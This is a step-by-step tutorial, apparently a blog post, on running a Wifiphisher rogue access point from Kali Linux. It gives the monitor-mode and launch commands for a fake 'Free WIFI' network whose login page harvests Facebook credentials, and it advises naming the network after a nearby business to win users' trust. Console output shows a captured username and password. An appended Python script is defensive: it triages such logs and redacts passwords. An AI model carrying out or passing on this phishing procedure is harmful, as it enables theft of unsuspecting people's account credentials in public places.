Wifiphisher Rogue Access Point Attack
Introduction:
Wifiphisher is a powerful command line tool that ethical hackers can use to create rogue wifi networks and capture sensitive data from unsuspecting users. The tool comes with a great deal of functionality; this tutorial focuses on the rogue network attack, in which a fake wifi access point is set up in a public place so that users connect to it and hand over usernames and passwords.
Prerequisites:
- Installation of Kali Linux (I run mine on a Raspberry Pi 4)
- Wifi Dongle with Monitor Mode capabilities
Tutorial:
In order to run this attack we first need to put the attached wifi dongle into monitor mode. Start by listing the attached interfaces with the following command:
ifconfig
Typically the dongle will be the interface named 'wlan1', as 'wlan0' is the internal wifi card, which isn't capable of monitor mode.
Next, run the following commands:
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
Now that you have a wifi interface with monitor mode enabled, you can use that interface for the wifiphisher attack. Run the following command:
wifiphisher -i wlan1 -e "Free WIFI" -p oauth-login
The -i option selects the interface to use, which is the one we just put into monitor mode. The -e option sets the ESSID of the fake network. In this case we are going with 'Free WIFI', but depending on the setting you could use the name of the business you are in to make users feel safe connecting. Finally, the -p option selects the authentication page template that pops up on the user's screen when they connect to the network. The template picked here requests a Facebook username and password to "authenticate". Unknowing users are tricked into handing over their Facebook credentials, believing the login is only being used to authenticate them with the network. This is a simple example; wifiphisher lets users customize these templates for more sophisticated attacks.
The following is what you'll see when a victim connects. First you can see the list of connected victims' MAC addresses. Then, in the HTTP requests, you'll see that the user has provided a username and password that could be used to access their account.
Extensions feed:                | Wifiphisher 1.4GIT
                                | ESSID: Free WIFI
                                | Channel: 6
                                | AP interface: wlan0
                                | Options: [Esc] Quit
                                |_____________________________
Connected Victims:
da:6b:29:73:58:12 10.0.0.53 Unknown iOS/MacOS
HTTP requests:
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUaCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOKCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIqCWcynf_cDxXwCLxiixG1c.ttf
[*] POST request from 10.0.0.53 with wfphshr-username=Test@test.com&wfphshr-password=password
[*] GET request from 10.0.0.53 for http://captive.apple.com/hotspot-detect.html
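The console lines above are also what an incident responder gets when a rogue AP like this is recovered from a physical site. The following triage helper is an added example, not part of wifiphisher or of this tutorial: it parses lines in the format shown above (the sample log and the dummy credentials are constructed from that output), lists which clients joined, flags clients whose captive-portal probe was answered by the rogue AP, and records which accounts submitted a password so they can be notified and reset, without ever storing the password itself.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in the wifiphisher console format shown above (dummy values).
SAMPLE_LOG = """\
Connected Victims:
da:6b:29:73:58:12 10.0.0.53 Unknown iOS/MacOS
HTTP requests:
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/RxZJ.ttf
[*] POST request from 10.0.0.53 with wfphshr-username=Test@test.com&wfphshr-password=password
[*] GET request from 10.0.0.53 for http://captive.apple.com/hotspot-detect.html
"""

VICTIM_RE = re.compile(r"^([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+(\d+\.\d+\.\d+\.\d+)\s+(.*)$", re.I)
GET_RE = re.compile(r"^\[\*\] GET request from (\S+) for (\S+)$")
POST_RE = re.compile(r"^\[\*\] POST request from (\S+) with (.*)$")

# Connectivity-check hosts that phones and laptops contact automatically on join.
# A GET for one of these logged by the rogue AP means the client's captive-portal
# check was intercepted, which is how the phishing page gets pushed to the screen.
PROBE_HOSTS = ("captive.apple.com", "connectivitycheck.gstatic.com", "msftconnecttest.com")

def parse_log(text):
    """Build a triage report: joined clients, intercepted probes, redacted credential posts."""
    report = {"victims": [], "probes": [], "credential_posts": []}
    for line in text.splitlines():
        line = line.strip()
        if m := VICTIM_RE.match(line):
            report["victims"].append({"mac": m[1].lower(), "ip": m[2], "device": m[3]})
        elif m := GET_RE.match(line):
            if any(host in m[2] for host in PROBE_HOSTS):
                report["probes"].append({"ip": m[1], "url": m[2]})
        elif m := POST_RE.match(line):
            fields = parse_qs(m[2])  # form body as key -> list of values
            report["credential_posts"].append({
                "ip": m[1],
                "username": fields.get("wfphshr-username", [""])[0],
                # Only record that a password was sent; never copy the secret into the report.
                "has_password": "wfphshr-password" in fields,
            })
    return report

def accounts_to_reset(report):
    """Usernames that submitted a password and therefore need a forced credential reset."""
    return sorted({p["username"] for p in report["credential_posts"] if p["has_password"] and p["username"]})

if __name__ == "__main__":
    r = parse_log(SAMPLE_LOG)
    print(f"{len(r['victims'])} client(s) joined, {len(r['probes'])} captive-portal probe(s) intercepted")
    print("accounts to reset:", accounts_to_reset(r))
```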
Conclusion:
Wifiphisher is a powerful tool that any ethical hacker should be comfortable drawing from their tool belt. Read more about its additional capabilities here.